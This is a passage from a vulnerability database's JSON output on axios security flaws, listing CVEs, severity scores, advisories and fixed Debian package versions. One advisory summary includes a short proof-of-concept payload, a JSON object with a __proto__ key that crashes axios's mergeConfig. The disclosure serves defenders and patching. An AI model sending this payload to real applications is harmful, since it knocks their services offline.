E-2026-42036","GHSA-vf2m-468p-8v99"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wbq8-z3qg-bfbt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20921?format=json","vulnerability_id":"VCID-x41s-g5mh-pkdq","summary":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig\n# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. 
An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n  const merge = mergeMap[prop] || mergeDeepProperties;\n  const configValue = merge(config1[prop], config2[prop], prop);\n  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. 
Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n    at computeConfigValue (lib/core/mergeConfig.js:100:25)\n    at Object.forEach (lib/utils.js:280:10)\n    at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment 
occurs.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25639","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15623","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15752","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15795","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15798","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1578","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15744","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1582","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1594","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15888","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15802","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15889","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15927","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16003","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1595","published_a
t":"2026-04-09T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.16649","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25639"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"},{"reference_url":"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"},{"reference_url":"https://github.com/axios/axios/pull/7369","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/
UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/pull/7369"},{"reference_url":"https://github.com/axios/axios/pull/7388","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/pull/7388"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.0","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/axios/axios/releases/tag/v0.30.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.3","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.30.3"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.13.5","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.13.5"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433","reference_id":"","referenc
e_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25639","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25639"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907","reference_id":"1127907","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2438237","reference_id":"2438237","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2438237"},{"reference_url":"https://github.com/advisories/GHSA-43fc-jf86-j433","reference_id":"GHSA-43fc-jf86-j433","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10184","reference_id":"RHSA-2026:10184","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10184"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:11414","reference_id":"RHSA-2026:11414","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:11414"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13542","reference_id":"RHSA-2026:13542","reference_type":"","scores"
:[],"url":"https://access.redhat.com/errata/RHSA-2026:13542"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13548","reference_id":"RHSA-2026:13548","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2694","reference_id":"RHSA-2026:2694","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2694"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3087","reference_id":"RHSA-2026:3087","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3087"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3105","reference_id":"RHSA-2026:3105","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3105"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3106","reference_id":"RHSA-2026:3106","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3106"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3107","reference_id":"RHSA-2026:3107","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3107"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3109","reference_id":"RHSA-2026:3109","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3109"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:4942","reference_id":"RHSA-2026:4942","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:4942"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5142","reference_id":"RHSA-2026:5142","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5142"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5168","reference_id":"RHSA-2026:5168","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5168"},{"reference_url":"https://access.redhat.com/errata/RHSA
-2026:5174","reference_id":"RHSA-2026:5174","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5174"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5636","reference_id":"RHSA-2026:5636","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5636"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5665","reference_id":"RHSA-2026:5665","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5665"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5807","reference_id":"RHSA-2026:5807","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5807"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6170","reference_id":"RHSA-2026:6170","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6170"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6174","reference_id":"RHSA-2026:6174","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6174"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6192","reference_id":"RHSA-2026:6192","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6192"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6277","reference_id":"RHSA-2026:6277","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6277"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6308","reference_id":"RHSA-2026:6308","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6308"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6309","reference_id":"RHSA-2026:6309","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6309"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6404","reference_id":"RHSA-2026:6404","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA
-2026:6404"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6428","reference_id":"RHSA-2026:6428","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6428"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6497","reference_id":"RHSA-2026:6497","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6497"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6567","reference_id":"RHSA-2026:6567","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6567"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6568","reference_id":"RHSA-2026:6568","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6568"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6802","reference_id":"RHSA-2026:6802","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6802"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7249","reference_id":"RHSA-2026:7249","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7249"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8218","reference_id":"RHSA-2026:8218","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8218"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8229","reference_id":"RHSA-2026:8229","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8229"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8499","reference_id":"RHSA-2026:8499","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8499"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8500","reference_id":"RHSA-2026:8500","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8500"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8501","reference_id":"RHSA-2026:8501","referen
ce_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8501"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9848","reference_id":"RHSA-2026:9848","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9848"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-25639","GHSA-43fc-jf86-j433"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x41s-g5mh-pkdq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354422?format=json","vulnerability_id":"VCID-z6xx-7p9v-g
qc6","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution to silently suppress all HTTP error responses (401, 403, 500, etc.), causing them to be treated as successful responses. This completely bypasses application-level authentication and error handling. The root cause is that validateStatus is the only config property using the mergeDirectKeys merge strategy, which uses JavaScript's in operator — an operator that inherently traverses the prototype chain. When Object.prototype.validateStatus is polluted with () => true, all HTTP status codes are accepted as success. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42041","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12226","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22152","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.24865","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42041"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url
":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461629","reference_id":"2461629","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461629"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42041","reference_id":"CVE-2026-42041","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42041"},{"reference_url":"https://github.com/advisories/GHSA-w9j2-pvgh-6h63","reference_id":"GHSA-w9j2-pvgh-6h63","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w9j2-pvgh-6h63"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63","reference_id":"GHSA-w9j2-pvgh-6h63","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:29:47Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42041","GHSA-w9j2-pvgh-6h63"],"risk_score":2.1,"exploitability":"0.5","weighted_severity":"4.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z6xx-7p9v-gqc6"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/96327?format=json","vulnerability_id":"VCID-1vkx-cwua-rqe4","summary":"In axios before 1.7.8, lib/helpers/isURLSameOrigin.js does not 
use a URL object when determining an origin, and has a potentially unwanted setAttribute('href',href) call. NOTE: some parties feel that the code change only addresses a warning message from a SAST tool and does not fix a vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-57965","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25107","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.24929","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2505","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25096","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28445","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28577","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28379","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28487","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.2849","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28447","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28398","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28414","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28392","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28339","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28534","pu
blished_at":"2026-04-02T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-57965"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57965","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57965"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios/commit/0a8d6e19da5b9899a2abafaaa06a75ee548597db","reference_id":"0a8d6e19da5b9899a2abafaaa06a75ee548597db","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/commit/0a8d6e19da5b9899a2abafaaa06a75ee548597db"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1094731","reference_id":"1094731","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1094731"},{"reference_url":"https://github.com/axios/axios/issues/6351","reference_id":"6351","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/issues/6351"},{"reference_url":"https://github.com/axios/axios/pull/6714","reference_id":"6714","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_el
ements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/pull/6714"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.7.8","reference_id":"v1.7.8","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.7.8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932089?format=json","purl":"pkg:deb/debian/node-axios@1.7.9%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.7.9%252Bdfsg-1%3